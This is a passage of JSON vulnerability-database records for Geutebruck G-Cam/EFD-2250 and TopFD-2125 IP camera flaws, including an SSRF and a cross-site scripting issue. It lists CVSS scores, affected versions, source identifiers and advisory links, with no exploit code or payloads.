            "id": "CVE-2018-7532"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137564"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          },
          {
            "date": "2018-03-22T18:29:01.137000",
            "db": "NVD",
            "id": "CVE-2018-7532"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137564"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          },
          {
            "date": "2024-11-21T04:12:18.600000",
            "db": "NVD",
            "id": "CVE-2018-7532"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck IP Cameras Remote code execution vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201803-2210

    Vulnerability from variot - Updated: 2024-11-23 21:53

    A server-side request forgery vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which could lead to proxied network scans. The G-Cam/EFD-2250 and Topline TopFD-2125 are both high-definition cameras from Geutebruck. There is a server-side request forgery vulnerability in Geutebruck IP cameras, which can be exploited by attackers. Multiple Geutebruck devices are prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. A SQL-injection vulnerability 3. A cross-site request-forgery vulnerability 4. An access-bypass vulnerability 5. A security-bypass vulnerability 6. A cross-site scripting vulnerability. Attackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 and Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of the German company Geutebrück. An attacker could exploit this vulnerability to perform proxied network scans.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201803-2210",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.7,
            "vendor": "geutebruck",
            "version": "1.12.0.4"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam\\/efd-2250",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "1.12.0.4"
          },
          {
            "model": "topline topfd-2125",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam/efd-2250",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.19"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "g cam efd 2250",
            "version": "1.12.0.4"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "topfd 2125",
            "version": "3.15.1"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
        "sources": [
          {
            "db": "BID",
            "id": "103474"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2018-7516",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-7516",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-06022",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "e2e7221e-39ab-11e9-a995-000c29342cb1",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-137548",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "LOW",
                "baseScore": 7.3,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-7516",
                "impactScore": 3.4,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-7516",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-7516",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-06022",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201803-765",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "IVD",
                "id": "e2e7221e-39ab-11e9-a995-000c29342cb1",
                "trust": 0.2,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-137548",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137548"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A server-side request forgery vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which could lead to proxied network scans. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. There is a server-side request forgery vulnerability in GeutebruckIPCameras, which can be exploited by attackers. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the   affected device, or to bypass certain security restrictions to perform  unauthorized actions, to compromise the application to access or modify  data and to exploit vulnerabilities in the underlying database, to  execute arbitrary script code in the browser of an unsuspecting user in  the context of the affected site or to  execute arbitrary code within  the context of the  affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company. An attacker could exploit this vulnerability to scan proxy networks",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-7516"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137548"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-7516",
            "trust": 3.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-18-079-01",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "103474",
            "trust": 2.0
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "E2E7221E-39AB-11E9-A995-000C29342CB1",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-137548",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137548"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "id": "VAR-201803-2210",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137548"
          }
        ],
        "trust": 1.7456349166666667
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "ICS",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:53:17.738000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "Patch for Geutebruck IPCameras Cross-Site Request Forgery Vulnerability (CNVD-2018-06022)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/122841"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250  and Topline TopFD-2125 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79351"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-918",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137548"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/103474"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7516"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7516"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137548"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137548"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137548"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          },
          {
            "date": "2018-03-22T18:29:00.900000",
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137548"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          },
          {
            "date": "2024-11-21T04:12:16.843000",
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck G-Cam/EFD-2250 and  Topline TopFD-2125 Server-side request forgery vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Code problem",
        "sources": [
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          }
        ],
        "trust": 0.8
      }
    }

    VAR-201803-2207

    Vulnerability from variot - Updated: 2024-11-23 21:53

    A cross-site scripting vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow remote code execution. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 contain a cross-site scripting vulnerability. Information may be obtained and information may be altered. The G-Cam/EFD-2250 and Topline TopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability; 2. A SQL-injection vulnerability; 3. A cross-site request-forgery vulnerability; 4. An access-bypass vulnerability; 5. A security-bypass vulnerability; 6. A cross-site scripting vulnerability. Attackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 and Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of the German company Geutebrück. Note that this entry itself tracks only the cross-site scripting issue (CVE-2018-7512, CWE-79); the six-item list appears to be the shared advisory text (BID 103474) that this description is merged from, so the other items are presumably tracked under separate identifiers.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201803-2207",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.7,
            "vendor": "geutebruck",
            "version": "1.12.0.4"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam\\/efd-2250",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "1.12.0.4"
          },
          {
            "model": "topline topfd-2125",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam/efd-2250",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.19"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "g cam efd 2250",
            "version": "1.12.0.4"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "topfd 2125",
            "version": "3.15.1"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          }
        ]
      },
      "credits": {
